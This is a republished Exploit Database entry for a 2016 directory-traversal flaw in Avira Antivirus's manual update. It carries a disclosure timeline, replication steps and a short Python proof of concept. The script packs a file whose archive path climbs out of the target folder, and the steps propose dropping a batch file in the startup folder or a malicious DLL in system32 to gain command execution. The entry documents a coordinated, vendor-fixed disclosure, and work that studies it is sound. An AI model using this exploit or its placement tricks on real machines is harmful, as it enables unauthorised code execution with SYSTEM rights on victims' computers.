Avira Antivirus 15.0.21.86 – ‘.zip’ Directory Traversal / Command Execution

• Exploit Database
• 93 阅读

• 作者： R-73eN
  日期： 2016-11-08
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/40741/

• # Title :Avira Antivirus >= 15.0.21.86 Command Execution (SYSTEM)
  # Date : 08/11/2016
  # Author : R-73eN
  # Tested on: Avira Antivirus 15.0.21.86 in Windows 7
  # Vendor : https://www.avira.com/
  # Disclosure Timeline:
  # 2016-06-28 - Reported to Vendor through Bugcrowd.
  # 2016-06-29 - Vendor Replied.
  # 2016-07-05 - Vendor Replicated the vulnerability.
  # 2016-09-02 - Vendor released updated version which fix the vulnerability.
  # 2016-11-08 - Public Disclosure
  # I would like to thank Avira security team for the quick response. 
  #
  # Vulnerability Description:
  # When the Avira Launcher manual update imports a zip file doesn't checks for " ../ " 
  # characters which makes it possible to do a path traversal and write anywhere in the system.
  # Vulnerability Replication
  # 1. Create a special crafted zip file with the python script attached. 
  # 2. The script will create a zip file named xvdf_fusebundle.zip with a filename test.bat (this can be changed) and will write this file to the root directory C:\ 
  # 3. You can change the directory go to startup and when the user reboots the script will get executed or you can write a malicious dll to a program directory or 
  #system32 directory which will get loaded and we gain remote command execution. 
  # 4. Open avira free antivirus 
  # 5. Go to update -> Manual Update 
  # 6. Select the malicious file 
  # 7. Directory traversal was sucessfull
  # Youtube Video: https://www.youtube.com/watch?v=IIEgWiDcw2Q
  # POC: 
  
  #!/usr/bin/python -w
  banner = ""
  banner += "_________ __\n" 
  banner +=" |_ _|_ __/ _| ___/ ___| ___ _ __/ \| |\n"
  banner +="| || '_ \| |_ / _ \| |_ / _ \ '_ \/ _ \ | |\n"
  banner +="| || | | |_| (_) | |_| |__/ | | |/ ___ \| |___ \n"
  banner +=" |___|_| |_|_|\___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
  print banner
  
  import zipfile, sys
  
  
  if(len(sys.argv) != 2):
  print "[+] Usage : python exploit.py file_to_do_the_traversal [+]"
  print "[+] Example: python exploit.py test.txt"
  exit(0)
  print "[+] Creating Zip File [+]"
  zf = zipfile.ZipFile("xvdf_fusebundle.zip", "w")
  zf.write(sys.argv[1], "..\\..\\..\\..\\..\\..\\..\\..\\test.bat")
  zf.close()
  print "[+] Created xvdf_fusebundle.zip successfully [+]"
  
  # Fix:
  # Update to the latest version.
  

  PowerShell

  Copy